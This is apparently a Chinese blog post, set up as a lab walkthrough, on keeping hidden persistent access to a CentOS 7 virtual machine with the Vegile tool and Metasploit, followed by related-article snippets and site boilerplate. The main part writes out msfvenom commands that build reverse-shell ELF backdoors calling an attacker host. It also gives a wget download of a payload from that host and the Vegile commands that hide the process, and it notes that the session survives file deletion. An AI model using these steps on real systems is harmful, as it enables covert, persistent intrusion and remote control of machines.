Linux无文件木马程序

最新推荐文章于 2024-09-11 15:16:48 发布
最新推荐文章于 2024-09-11 15:16:48 发布
阅读量629 收藏 12
点赞数 16
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Time_worm/article/details/141169711
版权

Vegile 是用于 linux 系统渗透测试中的权限维持。Vegile 这个工具将设置一个后门/rootkit,并且这个后门会直接隐藏进程,无限连接 metesploit,持续维持你的 Metepreter 会话,即使木马进程被杀死,它依然会再次重新运行,换句话说是该进程无限循环的。

一、生成恶意文件

生成恶意文件让目标系统执行来获取 shell,主要目的是用来获取权限

msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.47.165 LPORT=8080 -b "\x00" -f elf -o /var/www/html/notfile-backdoor

再生成一个隐藏执行的后门

msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.47.165 LPORT=4444 -b "\x00" -f elf -o /var/www/html/notfile-ghost

二、上传Vergile并启动Apache服务

Vegile 常用方法:

./Vegile --i  隐藏你的后门
./vegile --u  无限复制你的 metasploit 会话,即使被他 kill ,依然可以再次运行

使用注意事项

木马一定要放在Vegile 目录下

Vegile 一般用于维持 meterpreter 会话;

三、获取Linux 系统的shell

开启metersploit,运行监听模块,具体配置如下

打开CentOS7的虚拟机,通过apache服务器下载第一个恶意文件并运行

使用shell类型的payload,连接成功后没有提示

查看网络连接状态

查看IP地址,找不到命令怎么办

使用绝对路径就可以找到

四、创建无文件后门程序

配置监听 4444端口

打开一个新的终端开启metersploit监听,配置信息如下,payload最好用shell,比较小容易短时间发送完成

用之前建立的连接下载用于隐藏进程的工具,并将其解压

切换到Vegile目录,给其增加执行权限

//下载用于隐藏执行的后门程序 wget 192.168.47.165/notfile-ghost

//添加执行权限 chmod +x notfile-ghost

//隐藏后门程序执行 ./Vegile --i notfile-ghost

ERROR: ld.so: object '/usr/local/lib/libprocesshider.so' from /etc/ld.so.preload cannot be preloaded: ignored.

这个错误是由于64位系统缺少某个文件导致的,通过echo "" >/etc/ld.so.preload可以解决

在另一终端监听的msf也能连接到CentOS7虚拟机

可以发现,即使Vegile工具和后门文件被一起删除了,会话依然没有断开,依然可以运行各种命令来控制CentOS7虚拟机,而同样的尝试针对第一个恶意软件尝试后,就没有任何的命令都没有回应了,说明连接断开了

Time_worm
关注
运维安全】Linux下rootkit把木马程序的使用
互联网老辛
08-07 3446
文章目录实验环境Rootkit概述环境准备1. 上传软件包2. 解压软件包3. 安装依赖包安装adore-ng测试命令是否运行rootkit木马的使用提权演示1. 创建普通用户便于测试,因为我们要用普通用户提权2. 将adore-ng移动到可以让普通用户访问的目录,在root下普通用户没有权限3. 使用r命令进行提权4. 提权效果演示 实验环境 本实验在6.x的操作系统上完成: [root@gaosh-1 ~]# cat /etc/redhat-release CentOS release 6.9 (F
Linux文件木马程序渗透测试复现
永远是少年
06-15 1175
今天继续给大家介绍渗透测试相关知识,本文主要内容是Linux文件木马程序渗透测试复现。 一、实战介绍 二、初次渗透测试 三、无文件木马渗透测试
MSF-msfvenom Linux文件木马程序
枫梓林のBlog
04-21 1240
Linux文件木马程序 环境准备 文章目录Linux文件木马程序一、生成恶意文件二、启动Apache服务三、Vegile 使用四、获取Linux 系统的shell五、创建无文件后门程序 Kali Linux 2020.4 CentOS 7.6 IP地址 Kali Linux :192.168.37.139 CentOS :192.168.37.133 一、生成恶意文件 生成恶意文件让目标系统执行来获取 shell ┌──(root????fengzilin54)-[~] └─# msfve
linux中隐藏得木马程序,Linux远控分析
weixin_28938701的博客
05-01 1177
0x1 前言在国内,Linux操作系统以一般运用于服务器及相关后台,个人用户相对较少,因此Linux平台的木马病毒数量也远远不及Windows平台,其变种数量以及变化速度也比不上Windows平台。但Linux平台下的木马病毒有个非常显著的特点,就是不必与安全软件进行过多的对抗,因此导致其攻击手段的针对性极强,攻击面相当集中。以本文分析的样本为例,该样本为一远控木马,但不同于Windows下的远控...
Linux系统木马查杀
Saindy5828的专栏
02-18 654
查看进程打开的文件文件或目录被哪个进程占用、打开某个端口的进程、系统所有打开的端口等信息。监控TCP连接实时网络流量,可分别分析出入流量并进行排序,查找出流量异常的IP地址。查看系统监听的所有端口、网络连接情况,查找连接数过多的IP地址等信息。监控每个进程使用的网络流量,并从高到低排序,方便查找出流量异常的进程。查看运行的进程和进程系统资源占用情况,查找异常进程。追踪一个进程执行的系统调用,分析木马进程的运行情况。以树状图的形式显示进程间的关系。使用常用木马查杀命令。
Linux木马程序隐藏进程实战
qq_42499737的博客
07-15 973
实验环境 本实验在6.x的操作系统上完成: [root@gaosh-1 ~]# cat /etc/redhat-release CentOS release 6.9 (Final) Rootkit概述 Rootkit概述:Rootkit 是指在已获得系统最高权限的情况下,一种用来保持对目标系统最高访问权限并隐藏攻击行为的工具集. Rootkit 是一个典型的木马软件,广泛存在于多种操作系统之中。Rootkit 工具一般由多个程序组成,包含各种辅助攻击的工具。例如,网络嗅探工具,用来截获在网络上传输的信息
Linux中查找php木马程序例子
01-20
php木马其实是一个正常的php文件了,只是我们给了权限太高导致这个程序可以执行系统文件或调用系统命令来操作从而得到了服务器相关权限了,这样对方可以随时拿我们程序或数据库了,下面我来给各位介绍一些查找php...
记一次入侵Linux服务器和删除木马程序的经历
09-15
- **手动删除**:定位并移除木马程序和相关文件。文档中提供了一系列具体的命令用于删除疑似被感染的文件。 - **重新安装命令**:对于某些被替换或篡改的关键命令(如`ps`, `netstat`等),应考虑重新安装以恢复其...
php实现Linux服务器木马排查及加固功能
10-24
在网络安全日益重要的今天,PHP实现Linux服务器木马排查及加固功能显得至关重要。本文将详细讲解如何利用PHP进行木马排查以及采取哪些措施来加固服务器安全。 首先,针对特征码查找是木马排查的基础。PHP木马通常会...
Linux 进程控制
2302_77289177的博客
09-08 1304
Linux 进程控制
高效诊断Linux性能问题
Tiger93的博客
09-08 578
诊断Linux性能问题
Linux】ldd常见问题
最新发布
zclinux的博客
09-11 964
当你自己编译程序时,可以通过。
Linux和C语言(Day10)
weixin_65095004的博客
09-10 1124
实现特定功能的代码块定义函数: 存储类型 数据类型 函数名(参数列表){ 实现特定功能的代码块 }
Linux之MySQL主从复制
2302_79087378的博客
09-08 1502
MySQL的主从复制()是一种数据复制解决方案,将主数据库的DDL(数据定义语言)和DML(数据操纵语言)操作通过二进制日志传到从库服务器中,然后在从库上对这些日志重新执行(也叫重做),从而是的从库和主库的数据保存同步。MySQL支持将数据从一个MySQL服务器(主服务器)复制到一个或多个其他MySQL服务器(从服务器),从库同时也可以作为其他从服务器的主库,实现链状复制。MySQL主从复制的优点主要包含以下三个方面:主库出现问题,可以快速切换到从库提供服务;实现读写分离,降低主库的访问压力;
Linux 下 C/C++ 程序编译的过程
Teminator_的博客
09-08 9523
本文将介绍如何将 C/C++ 语言编写的程序转换成为处理器能够执行的二进制代码的过程,包括四个步骤:预处理()编译()汇编()链接(在此之前,首先来看一下 GCC 工具链。
LinuxLinux 可重入函数
2403_86785171的博客
09-08 1046
简单来说,可重入函数是线程安全的函数。当函数正在执行时,如果它被其他线程或中断再次调用,它能够正确处理这种情况。不使用静态或全局变量,或仅使用局部变量。不依赖非线程安全的库函数,如malloc或strtok。不修改输入参数。如果函数需要访问共享资源,则必须使用同步机制(如锁或信号量)来避免竞态条件。
linux下使用cmake和libpng来对png图像进行读写
wumingshi159的博客
09-09 360
在进行图像处理操作之前,首要任务是确保能够正确地读取图像。编写纯 C 语言代码进行图像处理时,不太适宜使用 OpenCV2。因此,为了遵循标准且便于操作,我们采用 libpng 的代码库来实现对 PNG 图像的读写。之所以选择在 Linux 系统下进行此项操作,主要是因为许多库在 Linux 环境下的安装更为便捷,例如 libpng。而在 Windows 系统下,需要下载源码、进行编译以及配置路径等一系列操作,极为繁琐,这与我们进行算法学习的初衷背道而驰。
Linux xargs命令
菜鸟记录
09-08 1163
Linux xargs命令
linux系统中木马文件后缀
08-01
Linux系统中木马文件可以使用各种后缀来隐藏其真实性质。以下是一些常见的木马文件后缀: 1. .exe:这是Windows系统上常见的可执行文件后缀,但是也可以在Linux系统中伪装成.exe后缀的文件。 2. .sh:这是Shell脚本文件后缀,用于在Linux系统上执行一系列命令。黑客可以将木马代码放入.sh文件中,并通过执行该脚本来运行木马程序。 3. .py:这是Python脚本文件后缀,类似于.sh文件,黑客可以将木马代码放入.py文件中,并通过执行该脚本来启动木马程序。 4. .so:这是Linux系统上的共享库文件后缀。黑客可以将木马代码编译成共享库,并将其后缀修改为.so,然后通过加载该库来运行木马程序。 5. .dll:这是Windows系统上的动态链接库文件后缀,但是也可以在Linux系统中找到.dll后缀的文件。黑客可以将木马代码编译成.dll文件,并将其放在Linux系统中。 6. .jar:这是Java的存档文件后缀。黑客可以将木马代码放在.jar文件中,并通过Java虚拟机来执行该文件。 请注意,以上列举的后缀只是一部分常见的木马文件后缀,黑客可以使用各种方法和技术来伪装木马文件,并使用不同的后缀来混淆系统或逃避防御机制。因此,使用杀毒软件和定期更新系统补丁是保护自己免受木马文件攻击的重要措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值